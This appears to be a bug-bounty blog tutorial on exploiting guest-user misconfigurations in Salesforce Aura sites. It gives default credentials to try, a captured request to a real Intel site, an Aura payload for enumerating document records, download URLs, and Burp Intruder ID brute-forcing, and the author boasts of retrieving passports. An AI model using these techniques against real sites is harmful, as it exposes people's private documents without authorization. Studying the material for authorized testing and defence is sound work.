Making small things BIG
Hacking Salesforce sites.
I seem to gravitate towards the CMS kind of sites. These big behemoth sites seem to be easily misconfigured. What does that say about me, well we don’t have enough time to list everything so let’s just get hacking.
Let's start with what Salcefore is: It provides customer relationship management service and also provides a complementary suite of enterprise applications focused on customer service, marketing automation, analytics, and application development.
Next, how do we tell if a site is a salesforce site? Well, there are a few giveaways. Listed below are commonly exposed Salesforce paths.
/aura
/s/sfsites/aura
/sfsites/aura
/s/aura
/s/fact
There is a nuclei script that will also tell you it found a Salesforce site, to make it easy to locate. Running the command below will get you what you want:
Nuclei -l list.txt -t nuclei-templates/misconfiguration/salesforce-aura.yaml
Once you find a Salesforce site what are you looking for? Well, to start if the login is exposed test some credentials.
test:test
admin:admin
test@test.com:test
If credentials don’t pan out, no problem. Most of the time the Guest user that has access to the site also has access to other files like Documents. To search for documents you first need to find a POST request like below, just clicking around the site and capturing the requests with Burp or ZAP you will find a request like the one below:
POST /s/sfsites/aura?r=5&other.Core_Utility.fetchUser=1 HTTP/1.1
Host: marketplace.intel.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://marketplace.intel.com/s/?language=en_US
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 705
Origin: https://marketplace.intel.com
Connection: close
Cookie: renderCtx=%7B%22pageId%22%3A%22faab079b-da30–4950–9474–83b3e47e8ec6%22%2C%22schema%22%3A%22Published%22%2C%22viewType%22%3A%22Published%22%2C%22brandingSetId%22%3A%22a0c9message=%7B%22actions%22%3A%5B%7B%22id%22%3A%22132%3Ba%22%2C%22descriptor%22%3A%22apex%3A%2F%2FCore_UtilityController%2FACTION%24fetchUser%22%2C%22callingDescriptor%22%3A%22UNKNOWN%22%2C%22params%22%3A%7B%7D%7D%5D%7D&aura.context=%7B%22mode%22%3A%22PROD%22%2C%22fwuid%22%3A%22QPQi8lbYE8YujG6og6Dqgw%22%2C%22app%22%3A%22siteforce%3AcommunityApp%22%2C%22loaded%22%3A%7B%22APPLICATION%40markup%3A%2F%2Fsiteforce%3AcommunityApp%22%3A%22Zj1VcUXqZfCDWZ-Q5LxXcA%22%2C%22COMPONENT%40markup%3A%2F%2Finstrumentation%3Ao11yCoreCollector%22%3A%228089lZkrpgraL8-V8KZXNw%22%7D%2C%22dn%22%3A%5B%5D%2C%22globals%22%3A%7B%22srcdoc%22%3Atrue%7D%2C%22uad%22%3Afalse%7D&aura.pageURI=%2Fs%2F%3Flanguage%3Den_US&aura.token=null
Once you have a valid request you then want to replace the message portion with the one below:
{“actions”:[{“id”:”123;a”,”descriptor”:”serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems”,”callingDescriptor”:”UNKNOWN”,”params”:{“entityNameOrId”:”ContentVersion”,”layoutType”:”FULL”,”pageSize”:100,”currentPage”:0,”useTimeout”:false,”getCount”:false,”enableRowActions”:false}}]}
Notice the entityNameOrId, this is what you want to change to find documents. Here are the three common entity names for searching for document IDs, ContentDocument, ContentVersion, and ContentDocumentListViewMapping.
There can be a lot of entityNameOrId that could expose other sensitive information. I have put together a list I have been using for the last few years that has helped. Using Burp’s intruder and using my list of entityNameOrIds can make finding sensitive data very easy. Just make sure to highlight entityNameOrId and let it rip.
Using my list you may find user information exposed and other useful information you can use for later attacks.
Once you have a list of Document IDs depending on what the Guest user has access to you can use the following URLs below with the IDs you gather to download those documents.
- Document-Prefix 015 — Eample=015t0000002TdSkAAK
/servlet/servlet.FileDownload?file=ID
- ContentDocument -Prefix -069 — Example=069t0000009Re14AAC
/sfc/servlet.shepherd/document/download/ID
- ContentVersion-Prefix 068 — Example=068t000000bYUbmAAG
/sfc/servlet.shepherd/version/download/ID
You can now download documents, in this case just an image.
You're probably wondering how bad this could get just being able to download documents that would be accessible to the Guest user, well I’m glad you asked. You could download passports.
You could download Travel documents.
I have downloaded some crazy things that should not be accessible to anyone and it’s amazing all of the things I have downloaded I did while not being authenticated, as far as the site is concerned all valid requests.
If you have issues with gathering IDs, you could use Burp to feed different object key prefix’s into Burp to test. Every ID in Salesforce is either 15 characters or 18 characters (API). The first 3-digits of the ID are always the Entity ID which can be used to determine the type of the entity. For example, an Account record with ID “001D000000IBVzo” has the prefix “001” on NA1 which has server ID ‘D0’.
Knowing the content version prefix 068 for content version. You can use Burp to construct valid IDs that then could be accessed. Using an example id like the below:
068§t§000000§9§§ii5gAAA§
Using the example id and surrounding parts of the id with the intruder markers, I tested different iterations to find valid content version IDs to download the content. Once you have a valid request you can easily find many valid ids and you get then browse them like the URL below.
https://example.com/sfc/servlet.shepherd/version/download/068t0000009ii5qAAA
To sum this up, Salesforce has so many more attacks but I think this is more than enough to get most hunters started and what the potential is. Now go out and find some bugs! If I can find them, so can you, don’t get discouraged! I hope you enjoyed reading it.
